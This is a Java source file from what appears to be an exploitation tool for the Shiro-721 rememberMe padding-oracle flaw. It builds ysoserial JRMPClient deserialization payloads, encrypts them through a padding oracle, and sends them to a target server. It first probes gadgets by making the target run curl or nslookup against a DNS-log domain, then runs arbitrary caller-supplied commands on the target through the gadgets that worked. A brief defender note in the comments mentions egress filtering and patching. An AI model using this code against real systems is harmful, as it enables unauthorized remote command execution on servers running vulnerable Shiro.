package com.shiroexploit.vulnverifier;

import com.shiroexploit.core.PaddingOracle;
import com.shiroexploit.util.*;
import java.io.File;
import java.util.*;

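/**
 * {@link Verifier} for the Shiro-721 rememberMe padding-oracle issue that delivers its
 * payload through a ysoserial {@code JRMPClient} object and confirms execution out of band.
 *
 * <p>What the class does, as far as this file shows:
 * <ul>
 *   <li>{@link #getValidGadget()} tries every gadget from {@link Config#getGadgets()}, each
 *       time asking the target to resolve a random 32-hex-character label under the
 *       configured DNS log domain, and keeps the gadgets whose label shows up in the DNS log.</li>
 *   <li>{@link #executeCmd(String)} replays the same delivery path with a caller-supplied
 *       command for every gadget that was confirmed.</li>
 * </ul>
 *
 * <p>Detection notes for defenders: a probe shows up as a DNS lookup (via {@code curl} or
 * {@code nslookup}) for a random hex label issued by the application server process, and the
 * {@code JRMPClient} payload presumably makes the target open an outbound connection to the
 * configured OOB server. The {@code rememberMe} value is produced by {@link PaddingOracle};
 * its request pattern is not visible in this file. Egress filtering on application servers
 * and a Shiro release that uses authenticated encryption for {@code rememberMe} are the
 * relevant mitigations.
 *
 * <p>Not thread-safe: the gadget list and {@code flag} are mutated without synchronisation.
 */
public class Shiro721VerifierWithJRMP implements Verifier {
    private final Config config;
    private final List<PayloadType> gadgets;
    // Set once getValidGadget() has finished its probe loop; never read inside this class.
    private boolean flag;

    /** Creates a verifier bound to the process-wide {@link Config} singleton. */
    public Shiro721VerifierWithJRMP() {
        System.out.println("[*] Using Shiro721VerifierWithJRMP");
        this.config = Config.getInstance();
        this.gadgets = new ArrayList<>();
    }

    /**
     * Probes each configured gadget and records the ones confirmed through the DNS log.
     *
     * <p>Stops at the first confirmed gadget when {@link Config#isSkipIfFound()} is set.
     *
     * @throws ExploitFailedException if payload encryption fails for a gadget, or if no
     *     gadget was confirmed after all of them were tried
     */
    @Override
    public void getValidGadget() throws ExploitFailedException {
        for (PayloadType type : config.getGadgets()) {
            System.out.println("[*] Trying Gadget: " + type.getName());

            // Fresh random label per gadget so a DNS hit can be attributed to exactly one probe.
            // replace() is used instead of replaceAll(): no regex is needed to strip the dashes.
            String uuid = UUID.randomUUID().toString().replace("-", "");
            String probeHost = uuid + "." + config.getDnsLogRecord();

            // Platform 0 is treated as Linux, anything else as Windows.
            String command = config.getPlatform() == 0
                    ? "curl http://" + probeHost
                    : "nslookup " + probeHost;

            process(command, type);

            if (Tools.getValidDNSLogRecord(uuid)) {
                this.gadgets.add(type);
                System.out.println("[+] Find Valid Gadget: " + type.getName());
                if (config.isSkipIfFound()) {
                    break;
                }
            }
        }

        this.flag = true;
        if (this.gadgets.isEmpty()) {
            throw new ExploitFailedException("[-] Can't find a valid gadget");
        }
    }

    /**
     * Sends {@code cmd} through every gadget previously confirmed by {@link #getValidGadget()}.
     *
     * <p>A gadget whose payload cannot be encrypted is reported and skipped; previously the
     * request was still sent with a {@code null} rememberMe value and reported as done.
     *
     * @param cmd command handed to {@code Tools.setJRMPServer}; it is also echoed to stdout
     * @return always {@code null}; this verifier has no channel for command output
     */
    @Override
    public String executeCmd(String cmd) {
        for (PayloadType gadget : this.gadgets) {
            System.out.println("[*] Using Gadget " + gadget.getName());
            System.out.println("[*] Executing command: " + cmd + "...");

            Tools.setJRMPServer(config.getOOBServerAddress(), config.getHTTPServicePort(), gadget, cmd);

            byte[] result = generateJrmpClientPayload();
            PaddingOracle paddingOracle = new PaddingOracle(config.getRequestInfo(), result);

            String rememberMe;
            try {
                rememberMe = paddingOracle.encrypt();
            } catch (ExploitFailedException e) {
                e.printStackTrace();
                // Nothing valid to send for this gadget; do not issue a request with a null cookie.
                System.out.println("[-] Failed to encrypt payload for gadget " + gadget.getName() + ", skipping");
                continue;
            }

            HttpRequest.request(config.getRequestInfo(), rememberMe);
            System.out.println("[+] Done");
        }

        return null;
    }

    /**
     * Runs one probe: registers the command with the JRMP server, builds and encrypts the
     * {@code JRMPClient} payload, sends it, then waits for the configured delay.
     *
     * @param command command registered with the JRMP server for this probe
     * @param payloadType gadget to pair with the command
     * @throws ExploitFailedException if {@link PaddingOracle#encrypt()} fails
     */
    private void process(String command, PayloadType payloadType) throws ExploitFailedException {
        Tools.setJRMPServer(config.getOOBServerAddress(), config.getHTTPServicePort(), payloadType, command);

        byte[] payload = generateJrmpClientPayload();
        PaddingOracle paddingOracle = new PaddingOracle(config.getRequestInfo(), payload);
        String rememberMe = paddingOracle.encrypt();
        HttpRequest.request(config.getRequestInfo(), rememberMe);

        try {
            // 1000L forces long arithmetic so a large configured delay cannot overflow int.
            Thread.sleep(config.getJRMPRequestDelay() * 1000L);
        } catch (InterruptedException e) {
            e.printStackTrace();
            // Restore the interrupt status so callers can still observe the cancellation.
            Thread.currentThread().interrupt();
        }
    }

    /**
     * Runs the local {@code ysoserial.jar} (expected in the working directory) to produce a
     * {@code JRMPClient} object that points at the configured OOB server and JRMP port.
     *
     * <p>NOTE(review): the command line is assembled by string concatenation from config
     * values and the working-directory path. How {@code Tools.exec} tokenises it is not
     * visible here; if it is not shell-aware the quoted path may break on spaces, and an
     * OOB address containing whitespace or shell metacharacters would alter the local
     * command. Confirm that these config values are validated where they are loaded.
     *
     * @return the bytes returned by {@code Tools.exec} for the ysoserial invocation
     */
    private byte[] generateJrmpClientPayload() {
        String jarPath = System.getProperty("user.dir") + File.separator + "ysoserial.jar";
        String command = "java -jar \"" + jarPath + "\" JRMPClient "
                + config.getOOBServerAddress() + ":" + config.getJRMPServicePort();
        return Tools.exec(command);
    }
}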
